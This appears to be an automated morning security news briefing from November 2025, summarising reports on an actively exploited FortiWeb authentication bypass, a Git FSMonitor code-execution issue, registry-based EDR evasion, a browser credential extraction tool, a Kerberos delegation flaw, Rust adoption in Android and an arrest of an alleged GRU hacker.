Before we begin today's briefing, we have a critical security alert. CVE-2025-64446, a path traversal in Fortinet FortiWeb web application, has been added to the CISA Known Exploited Vulnerabilities catalog.
Good morning. This is your security briefing for Friday, November 14, 2025, covering 8 articles analyzed overnight. All attribution is by the article authors, and all article analysis is automated.
RootUp has published research on a Git FSMonitor vulnerability that enables arbitrary code execution when users open malicious folders in IDEs. The exploit leverages automatic git status execution by IDEs, triggering malicious scripts configured in the repository's core.fsmonitor setting, making it particularly effective in phishing and remote takeover scenarios.
Prelude Security details a new technique using the Windows RegRestoreKey API to manipulate registry entries while evading EDR detection. The method creates modified registry hive files and restores them over existing keys, bypassing traditional monitoring of RegCreateKey or RegSetValue calls to establish persistence without triggering standard security telemetry.
dk0m has released ZeroCrumb, a tool that extracts application-bound credentials and cookies from Chrome, Brave, and Edge browsers without elevated privileges. The tool uses Transacted Hollowing to bypass the Chrome Elevation Service and impersonates Chrome instances to access the IElevator COM interface for decrypting sensitive user data.
reconurge has released flowsint, an open-source OSINT graph exploration tool on GitHub designed for ethical cybersecurity investigations. The platform provides visual, flexible graph-based analysis capabilities for analysts and investigators, with explicit restrictions against unauthorized surveillance or privacy violations.
watchTowr Labs reports that Fortinet FortiWeb appliances are affected by CVE-2025-64446, a critical authentication bypass vulnerability being actively exploited in the wild. Attackers combine path traversal with CGIINFO HTTP header manipulation to impersonate administrative users, with multiple versions from 6.3 through 8.0 vulnerable and patches now available.
Silverfort researchers discovered CVE-2025-60704, a Kerberos Constrained Delegation vulnerability affecting Active Directory environments. Attackers can exploit this through Man-in-the-Middle techniques to escalate privileges and impersonate domain users including administrators, with Microsoft having patched the vulnerability at CVSS 7.5.
Google reports that Rust adoption in Android development has reduced memory safety vulnerabilities to below 20% of total vulnerabilities in 2025. Rust demonstrates a 1000x reduction in vulnerability density compared to C and C++, while improving development efficiency with 20% fewer code revisions and 25% less review time.
The Phuket News reports that Thai cyber police, coordinating with the FBI, arrested 35-year-old Russian national Aleksey Lukashev in Phuket, Thailand. Lukashev is believed to be a GRU officer and world-class hacker linked to cyberattacks targeting government institutions in Europe and the United States.